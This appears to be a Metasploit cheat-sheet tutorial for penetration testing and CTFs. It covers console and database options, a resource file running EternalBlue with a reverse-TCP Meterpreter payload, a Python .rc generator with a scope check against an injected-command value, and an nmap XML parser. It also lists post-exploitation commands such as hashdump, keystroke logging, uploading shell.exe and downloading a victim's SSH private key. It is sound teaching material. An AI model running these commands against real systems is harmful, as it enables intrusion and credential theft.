Introduction
Metasploit is one of the most powerful tools in an ethical hacker’s arsenal. Whether you’re performing a penetration test or competing in a Capture The Flag (CTF) event, Metasploit streamlines the process of identifying, exploiting, and gaining control of vulnerable systems.
This cheat sheet is designed as a quick-reference guide to help you master core Metasploit functionality—from starting up to post-exploitation.
🧰 Getting Started
MSF Database

Metasploit keeps hosts, services, credentials and loot in a PostgreSQL database; run msfdb init once, then msfdb status to confirm the console will find it.

```text
Usage: msfdb [options] <command>

Manage a Metasploit Framework database

General Options:
    --component COMPONENT         Component used with provided command (default: database)
    -d, --debug                   Enable debug output
    -h, --help                    Show this help message
    --use-defaults                Accept all defaults and do not prompt for options

Database Options:
    --msf-db-name NAME            Database name (default: msf)
    --msf-db-user-name USER       Database username (default: msf)
    --msf-test-db-name NAME       Test database name (default: msftest)
    --msf-test-db-user-name USER  Test database username (default: msftest)
    --db-port PORT                Database port (default: 5433)
    --db-pool MAX                 Database connection pool size (default: 200)
    --connection-string URI       Use a pre-existing database cluster for init
    ...

Commands:
    init      initialize the component
    reinit    delete and reinitialize the component
    delete    delete and stop the component
    status    check component status
    start     start the component
    stop      stop the component
    restart   restart the component
```
MSF Console
```text
Usage: msfconsole [options]

Database options:
    -n, --no-database              Disable database support

Framework options:
    -c FILE                        Load the specified configuration file
    -v, -V, --version              Show version

Module options:
    -m, --module-path DIRECTORY    Load an additional module path

Console options:
    -a, --ask                      Ask before exiting Metasploit or accept 'exit -y'
    -H, --history-file FILE        Save command history to the specified file
    -o, --output FILE              Output to the specified file
    -p, --plugin PLUGIN            Load a plugin on startup
    -q, --quiet                    Do not print the banner on startup
    -r, --resource FILE            Execute the specified resource file (- for stdin)
    -x, --execute-command COMMAND  Execute the specified console commands
    -h, --help                     Show this message
```
📜 Automating with Resource Files
Automate command sequences with .rc resource files. msfconsole executes the file line by line, exactly as if you had typed each command at the prompt:

```shell
msfconsole -q -r my_attack.rc
```

Sample my_attack.rc:

```text
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.105
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
exploit
```
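Because a resource file is run line by line with no further confirmation, anything that ends up in it gets executed. The following added example (not code from the original post or from Metasploit) generates the same use / set / exploit sequence for a whole list of targets, but first checks every host against an authorised scope and rejects any value that is not a bare IP address, so a malformed scope-file entry cannot smuggle an extra console command into the script. The exploit, payload, addresses and port are assumptions chosen to match the sample above.

```python
"""Generate a Metasploit resource (.rc) file for a list of targets.

Added example, not from the original post or from Metasploit. It emits one
"set RHOSTS / exploit -j -z" pair per host after validating each host
against an authorised scope. Module, payload and addresses are assumptions.
"""
import ipaddress

# Hypothetical engagement parameters (assumptions, not from the page).
AUTHORISED_SCOPE = ipaddress.ip_network("192.168.1.0/24")
EXPLOIT = "exploit/windows/smb/ms17_010_eternalblue"
PAYLOAD = "windows/x64/meterpreter/reverse_tcp"
LHOST = "192.168.1.100"


class ScopeError(ValueError):
    """Raised when a target is outside the authorised scope or malformed."""


def validate_target(host: str) -> str:
    """Return the normalised IP string, or raise ScopeError.

    ipaddress.ip_address() accepts only a bare address, so a scope-file entry
    such as "192.168.1.5\\nsessions -K" (an injected console command) can
    never reach the generated .rc file.
    """
    try:
        addr = ipaddress.ip_address(host.strip())
    except ValueError as exc:
        raise ScopeError(f"not an IP address: {host!r}") from exc
    if addr not in AUTHORISED_SCOPE:
        raise ScopeError(f"{addr} is outside authorised scope {AUTHORISED_SCOPE}")
    return str(addr)


def build_resource_script(targets, lhost=LHOST, first_lport=4444) -> str:
    """Build the .rc text: one background exploit attempt per target.

    'exploit -j -z' runs each attempt as a background job and does not
    auto-interact with a new session, so the console keeps processing the
    remaining lines. Each target gets its own LPORT so two handlers never
    compete for the same listening port.
    """
    lines = [
        "# generated resource script; review before running",
        f"use {EXPLOIT}",
        f"set PAYLOAD {PAYLOAD}",
        f"set LHOST {lhost}",
    ]
    for i, host in enumerate(targets):
        addr = validate_target(host)  # raises before anything is written
        lines.append(f"set RHOSTS {addr}")
        lines.append(f"set LPORT {first_lport + i}")
        lines.append("exploit -j -z")
    lines.append("sessions -l")  # show what came back once all jobs ran
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    # Constructed sample scope-file contents.
    sample_targets = ["192.168.1.105", "192.168.1.110"]
    print(build_resource_script(sample_targets), end="")
```

Write the output to a file and run it with msfconsole -q -r as shown above; the script refuses to produce anything at all if a single entry is out of scope, which is the behaviour you want before an unattended batch run.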
🔎 Basic Commands
| Command | Description |
|---|---|
| search <keyword> | Search for modules |
| info | Show detailed information about the current (or a named) module |
| use <module> | Load a module |
| show options | Show the module's options and their current values |
| set <option> <value> | Set an option (setg sets it globally for every module) |
| check | Test whether the target is vulnerable without exploiting it (only for modules that implement it) |
| run or exploit | Execute the module |
| back | Leave the current module |
| exit | Exit Metasploit |
| help | List Metasploit commands |
💡 Tip: Use the Tab key for auto-completion of commands and module names.
Workspace
```text
Usage:
    workspace                  List workspaces
    workspace [name]           Switch workspace

OPTIONS:
    -a, --add <name>           Add a workspace.
    -d, --delete <name>        Delete a workspace.
    -D, --delete-all           Delete all workspaces.
    -h, --help                 Help banner.
    -l, --list                 List workspaces.
    -r, --rename <old> <new>   Rename a workspace.
    -S, --search <name>        Search for a workspace.
    -v, --list-verbose         List workspaces verbosely.
```
Search Filter
```text
Usage: search [<options>] [<keywords>:<value>]

Prepending a value with '-' will exclude any matching results.
If no options or keywords are provided, cached results are displayed.

OPTIONS:
    -h, --help      Help banner
    -I, --ignore    Ignore the command if the only match has the same name as the search
    -o <filename>   Send output to a file in csv format
    -r <column>     Reverse the order of search results to descending order
    -S <filter>     Regex pattern used to filter search results
    -s <column>     Sort search results by the specified column in ascending order
    -u              Use module if there is one result

Keywords:
    action       : Modules with a matching action name or description
    arch         : Modules affecting this architecture
    att&ck       : Modules with a matching MITRE ATT&CK ID or reference
    author       : Modules written by this author
    bid          : Modules with a matching Bugtraq ID
    check        : Modules that support the 'check' method
    cve          : Modules with a matching CVE ID
    description  : Modules with a matching description
    edb          : Modules with a matching Exploit-DB ID
    fullname     : Modules with a matching full name
    mod_time     : Modules with a matching modification date
    name         : Modules with a matching descriptive name
    osvdb        : Modules with a matching OSVDB ID
    platform     : Modules affecting this platform -(windows,linux,unix,android,ios)
    port         : Modules with a matching port
    rank         : Modules with a matching rank
    ref          : Modules with a matching ref
    reference    : Modules with a matching reference
    session_type : Modules with a matching session type
    target       : Modules affecting this target
    type         : Modules of a specific type -(exploit, payload, auxiliary, encoder, evasion, post, or nop)

Supported search columns:
    rank            : Sort modules by their exploitability rank
    date            : Sort modules by their disclosure date. Alias for disclosure_date
    disclosure_date : Sort modules by their disclosure date
    name            : Sort modules by their name
    type            : Sort modules by their type
    check           : Sort modules by whether or not they have a check method
    action          : Sort modules by whether or not they have actions

Examples:
    search cve:2009 type:exploit
    search cve:2009 type:exploit platform:-linux
    search cve:2009 -s name
    search type:exploit -s type -r
    search att&ck:T1059
    search ftp type:exploit platform:linux
```
Managing Sessions, Jobs
```text
Usage: sessions [options] or sessions [id]

Active session manipulation and interaction.

OPTIONS:
    -c, --command <command>   Run a command on the session given with -i, or all
    -d, --list-inactive       List all inactive sessions
    -h, --help                Help banner
    -i, --interact <id>       Interact with the supplied session ID
    -k, --kill <id>           Terminate sessions by session ID and/or range
    -K, --kill-all            Terminate all sessions
    -l, --list                List all active sessions
    -n, --name <id> <name>    Name or rename a session by ID
    -q, --quiet               Quiet mode
    -s, --script <script>     Run a script or module on the session given with -i
    -t, --timeout <seconds>   Set a response timeout (default: 15)
    -u, --upgrade <id>        Upgrade a shell to a meterpreter session on many platforms
    -v, --list-verbose        List all active sessions in verbose mode
    -x, --list-extended       Show extended information in the session table

background            # Inside a session: return to msfconsole and keep the session alive
run -j / exploit -j   # Run a module or exploit as a background job
```

```text
Usage: jobs [options]

Active job manipulation and interaction.

OPTIONS:
    -h   Help banner.
    -i   Lists detailed information about a running job.
    -k   Terminate jobs by job ID and/or range.
    -K   Terminate all running jobs.
    -l   List all running jobs.
    -p   Add persistence to job by job ID
    -P   Persist all running jobs on restart.
    -S   Row search filter.
    -v   Print more detailed info. Use with -i and -l
```
🎯 Payloads
Payloads define what happens after exploitation.
- Reverse shell: the payload on the target connects back to a listener (handler) on the attacker's machine. This is the usual choice, because it works even when a firewall or NAT blocks inbound connections to the target.
- Bind shell: the payload opens a listening port on the target and the attacker connects to it. This needs a direct, unfiltered path to that port on the target.
After you choose an exploit, run the following to list the payloads that are compatible with it:

```text
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show payloads
```

If you run an exploit without setting PAYLOAD, Metasploit picks one for you from its built-in preference list, taking the first entry that is compatible with the exploit and target. In order of preference:

```text
windows/meterpreter/reverse_tcp
java/meterpreter/reverse_tcp
php/meterpreter/reverse_tcp
php/meterpreter_reverse_tcp
ruby/shell_reverse_tcp
cmd/unix/interact
cmd/unix/reverse
cmd/unix/reverse_perl
cmd/unix/reverse_netcat_gaping
windows/meterpreter/reverse_nonx_tcp
windows/meterpreter/reverse_ord_tcp
windows/shell/reverse_tcp
generic/shell_reverse_tcp
```
📡 Auxiliary & Scanning Modules
```text
# Port scanner
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.1/24
run

# DNS enumeration (the module is enum_dns, not dns_enum)
use auxiliary/gather/enum_dns
set DOMAIN <target_domain_name>
run

# FTP server: serve files from a local directory to the target
use auxiliary/server/ftp
set FTPROOT /tmp/ftproot
run

# Pivoting: SOCKS proxy that relays through Metasploit's routing table.
# Add a route through an existing session first (route add <subnet> <session_id>),
# then point proxychains at the SOCKS port. On Metasploit 6 the SOCKS modules
# were merged into auxiliary/server/socks_proxy (set VERSION 4a or 5).
use auxiliary/server/socks4
run
```
🗃 Database Integration
Metasploit can store data such as hosts, services, vulnerabilities and loot in its database:

```text
# Useful commands:
hosts
services
vulns
loot

# Use db_nmap for integrated scanning; results are imported automatically:
db_nmap -sV 192.168.1.0/24
```
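db_nmap simply runs nmap and imports its XML output into the hosts and services tables, after which commands like services -u (open ports only) or services -s microsoft-ds query the result. The following added example (not Metasploit code) parses a constructed nmap XML fragment into the same kind of host and service records, which is useful when you want to feed an existing nmap -oX scan into your own tooling or sanity-check what an import will contain. The XML is a constructed sample, not real scan output.

```python
"""Parse Nmap XML into host/service records like the ones db_nmap stores.

Added example, not Metasploit code. The XML below is a constructed sample.
"""
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

# Constructed sample of nmap -sV -oX output (not a real scan).
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX - 192.168.1.0/24">
  <host>
    <status state="up"/>
    <address addr="192.168.1.105" addrtype="ipv4"/>
    <address addr="00:0C:29:AA:BB:CC" addrtype="mac"/>
    <hostnames><hostname name="win7-lab" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="445">
        <state state="open"/>
        <service name="microsoft-ds" product="Windows 7 microsoft-ds"/>
      </port>
      <port protocol="tcp" portid="3389">
        <state state="open"/>
        <service name="ms-wbt-server"/>
      </port>
      <port protocol="tcp" portid="22">
        <state state="closed"/>
        <service name="ssh"/>
      </port>
    </ports>
  </host>
  <host>
    <status state="down"/>
    <address addr="192.168.1.106" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    info: str = ""  # product/version string, what the `services` table shows as info


@dataclass
class Host:
    address: str
    mac: str = ""
    hostname: str = ""
    services: list = field(default_factory=list)


def parse_nmap_xml(xml_text: str) -> list:
    """Return one Host per responding host, with every reported port as a Service."""
    root = ET.fromstring(xml_text)
    hosts = []
    for h in root.findall("host"):
        status = h.find("status")
        if status is None or status.get("state") != "up":
            continue  # a host that never answered carries no port data worth storing
        host = Host(address="")
        for a in h.findall("address"):
            if a.get("addrtype") in ("ipv4", "ipv6"):
                host.address = a.get("addr")
            elif a.get("addrtype") == "mac":
                host.mac = a.get("addr")
        hn = h.find("hostnames/hostname")
        if hn is not None:
            host.hostname = hn.get("name", "")
        for p in h.findall("ports/port"):
            state = p.find("state")
            svc = p.find("service")
            host.services.append(Service(
                port=int(p.get("portid")),
                proto=p.get("protocol"),
                state=state.get("state") if state is not None else "unknown",
                name=svc.get("name", "") if svc is not None else "",
                info=svc.get("product", "") if svc is not None else "",
            ))
        hosts.append(host)
    return hosts


def open_services(hosts, name=None):
    """Mimic `services -u` (open ports only), optionally narrowed like `-s <name>`."""
    out = []
    for h in hosts:
        for s in h.services:
            if s.state == "open" and (name is None or s.name == name):
                out.append((h.address, s.port, s.name))
    return out


if __name__ == "__main__":
    for addr, port, name in open_services(parse_nmap_xml(SAMPLE_NMAP_XML)):
        print(f"{addr}:{port} {name}")
```

The closed port 22 is kept in the host record (as the database keeps it, with its state) but filtered out by open_services, which is the distinction between services and services -u in the console.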
🧠Meterpreter Basics
Once you have a Meterpreter shell, try these:
| Command | Purpose |
|---|---|
| sysinfo | Show system info (hostname, OS, architecture) |
| getuid | Show the user the Meterpreter session is running as |
| shell | Drop into a native command shell on the target |
| download / upload | File transfer |
| screenshot | Capture the desktop |
| keyscan_start / keyscan_dump | Keystroke logging (migrate into a process that owns the desktop, e.g. explorer.exe, first) |
| hashdump | Dump password hashes (needs SYSTEM on Windows; try getsystem first) |
| ps, migrate, background | List processes, migrate into another process, send the session to the background |
Managing Channel
```text
Usage: channel [options]

Displays information about active channels.

OPTIONS:
    -c   Close the given channel.
    -h   Help menu.
    -i   Interact with the given channel.
    -k   Close the given channel.
    -K   Close all channels.
    -l   List active channels.
    -r   Read from the given channel.
    -w   Write to the given channel.
```
Transferring Files – Upload
Syntax: upload /path/to/local/file [destination_path_on_target]

```text
# On Windows targets:
meterpreter > upload /home/kali/Desktop/shell.exe C:\\Users\\Public\\

# Confirm the upload worked:
meterpreter > ls C:\\Users\\Public\\

# On Linux targets:
meterpreter > upload /home/kali/Desktop/exploit.sh /tmp/
```

⚠ Note: Use double backslashes (\\) in Windows paths to avoid escape issues.
Transferring Files – Download
Syntax: download /path/to/remote/file [destination_path_on_local_machine]

```text
# From a Windows target:
meterpreter > download C:\\Users\\target\\secret.txt /home/kali/Desktop/

# From a Linux target:
meterpreter > download /home/victim/.ssh/id_rsa /home/kali/Desktop/
```

⚠ Note: Use double backslashes (\\) in Windows paths to avoid escape issues.
🎯 Final Thoughts & Takeaways
Metasploit isn’t just a framework—it’s a mindset. By mastering the core commands and modules, you can automate your testing, uncover vulnerabilities, and simulate real-world attacks safely. But remember: with great power comes great responsibility.
🛡 Always practice ethical hacking, get written permission, and use Metasploit in safe, legal environments like labs and CTFs.
🔗 Further Reading: